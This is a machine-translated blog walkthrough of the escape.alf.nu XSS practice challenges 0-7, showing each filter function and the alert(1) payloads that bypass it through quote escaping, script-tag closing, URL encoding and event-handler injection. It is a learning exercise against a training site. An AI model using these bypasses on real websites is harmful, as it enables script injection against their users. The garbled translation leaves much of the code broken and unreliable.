Escape.alf.nu XSS challenges 0-7 One step-by-step learning XSS

This article link: http://blog.csdn.net/u012763794/article/details/51507593

The following challenges stem from: http://escape.alf.nu/

You may need to html,css,javascript, regular expression of knowledge, not to hurry to learn it

I did a little experiment on the day before.

Cross-site Scripting attack basics

http://blog.csdn.net/u012763794/article/details/45869479

XSS Advanced One

http://blog.csdn.net/u012763794/article/details/46429273

XSS Advanced Two

http://blog.csdn.net/u012763794/article/details/47177507

XSS Advanced Three

http://blog.csdn.net/u012763794/article/details/48215585

Challenge 0

function Escape (s) {  //warmup.  Return ' <script>console.log ("' +s+ '");</script> ';}

Without any filtering, close double quotes and parentheses on the line
Payload

") alert (1);("

Of course, annotations can also

"); alert (1);//

Challenge 1

function Escape (s) {  ///escaping scheme courtesy of Adobe Systems, Inc.  s = s.replace (/"/g, ' \ \" ');  Return ' <script>console.log ("' + S + '");</script> ';}

You can see the use of a regular match, G is the global mode, is to find the first, and then continue to find, until the end, the double quotation marks are replaced by \ ", (the code in the first \ \ to the second \ to escape)
Let's see if we do some experiments.
By the actual combat in the console, you can see "replaced by \"
So how to make our "effective, we must eat \"

Then we can use \ to eat \ on the line
Payload: \ "); alert (1);//
In the console can also be practiced, in order to make s for \ ", here to enter the time to \ \", can be consistent with the above results
Most likely because the browser console will use \ As an escape character, and the title string to the background is not the \ as an escape character, such as the PHP with single quotation marks, you can see the quotation marks are not highlighted, JS and double quotes are highlighted only to the foreground as an escape character


Challenge 2

function Escape (s) {  s = json.stringify (s);  Return ' <script>console.log (' + S + ');</script> ';}

The Json.stringify () method serializes any JavaScript value into a JSON string.
Look at the basic usage


But we just type in double quotes, or our normal payload.
You can see that the double quotes are being cited,and the double quotes are \ escaped
Then we'll use the script tag to close it.
Payload:1.</script><script>alert (1) </script> , although there is a mistake, but can play the frame
2.</script><script>alert (1)//



There is an error that does not affect the execution of the middle code


Challenge 3

function Escape (s) {  var url = ' Javascript:console.log (' + json.stringify (s) + ') ';  Console.log (URL);  var a = document.createelement (' a ');  a.href = URL;  Document.body.appendChild (a);  A.click ();}

This is the construction of our input URL, followed by a new hyperlink tag, url into the href, it is better to click (click) a bit
We're going to try it locally, we know that json.stringify () will escape the double quotes, and you can see


But we can use the URL code, our href is the expression URL, so%22 represents the double quotation marks will work.

then finally Payload%22); alert (1)//


Challenge 4 Code:

function Escape (s) {  var text = s.replace (/</g, ' &lt; '). Replace (' "', ' &quot; ');  URLs  Text = text.replace (/(http:\/\/\s+)/g, ' <a href= ' >$1</a> ');  [[img123| Description]]  text = Text.replace (/\[\[(\w+) \| (. +?) \]\]/g, ' 
The first thing to do is to read the regular expression and learn it quickly.
The first line filters the less than and double quotes as HTML entity characters, but we find that the trailing double quotation mark does not turn on G mode, so it is replaced only once
The second line is to put the incoming URL into the href and the label in the middle of the tag, as if no use
The next line is the focus of the third row [[a|b]] replaces the position of a position with the $1,b location, depending on

Well, let's construct, let's use the OnLoad event, and the onload event will happen immediately after the page or image has finished loading. may be the website judge the problem, OnError pass but
Payload:[[x| "" Onload=alert (1) "] or [[x|] "onload=" alert (1)], where two quotation marks are used, one is turned into an entity character, and the second one is not turned

Challenge 5 Code
function Escape (s) {  //Level 4 had a typo, thanks Alok.  If your solution for 4 still works here, you can go back and get more points on level 4 now.  var text = S.replace (/</g, ' &lt; '). Replace (/"/g, ' &quot; ');  URLs  Text = text.replace (/(http:\/\/\s+)/g, ' <a href= ' >$1</a> ');  [[img123| Description]]  text = Text.replace (/\[\[(\w+) \| (. +?) \]\]/g, ' 
You can see the double quotes changed to G mode.

So what do we do, we can find this sentence can provide us with double quotes text = Text.replace (/(http:\/\/\s+)/g, ' <a href= ' >$1</a> ');where \s Match any non-whitespace character
When we enter http://onload= ' alert (1) ' It becomes <a href= ' http://onload= ' alert (1) ' >http://onload= ' alert (1) ' </a>

When we enter this, the last replace[[x|http://onload= ' alert (1) '] is first replaced with [[X|<a href= ' http://onload= ' alert (1) ']] ">http:// Onload= ' alert (1) ']]</a> The last sentence replace is replaced with (we found the href has a] number) http://onload= ' Alert (1) ']]</a>

First analysis to see how the browser parsing, we left to right 
According to the left and right single double quotes match, left and right angle brackets match, as above, you can see only one img tag, the back of the fee
We copy the statement to the HTML file to see if this is the case, there is a difference between http: The following//becomes a space
But I didn't play the window, I changed it to onerror, and I bounced the window.
Maybe it's just the onload judge when the problem is over there?
Challenge 6
Code
function Escape (s) {  //slightly too lazy to make-input fields.  Pass in something like "Textnode#foo"  var m = s.split (/#/);  Only slightly contrived on this point.  var a = document.createelement (' div ');  A.appendchild (document[' Create ' +m[0]].apply (document, M.slice (1)));  return a.innerhtml;}
The first input of the # partition document[' create ' +m[0]] is equivalent to calling the document member function, create the beginning of a lot of


Apply is similar to the above, slightly different.
So how do we construct alert (1), with element should not, can only create the label, there is a Comment attract us, because the comment we can enter casually, there is closed on the line payload:comment#--> or comment#><svg onload=alert (1)


Challenge 7
Code
function Escape (s) {  //Pass Inn "Callback#userdata"  var thing = S.split (/#/);   if (!/^[a-za-z\[\] ']*$/.test (thing[0])) return ' Invalid callback ';  var obj = {' UserData ': thing[1]};  var json = json.stringify (obj). replace (/</g, ' \\u003c ');  Return "<script>" + thing[0] + "(" + JSON + ") </script>";}
Json.stringify (obj) will transfer the double quotation marks,. replace (/</g, ' \\u003c '); this will convert "<" to Unicode encoding \u003c then we can use single quotation marks to close the front, the semicolon to end the previous sentence, followed by Comments

It's OK to use a multiline comment, but there's something wrong with that.

This article link: http://blog.csdn.net/u012763794/article/details/51507593
Escape.alf.nu XSS challenges 0-7 One step-by-step learning XSS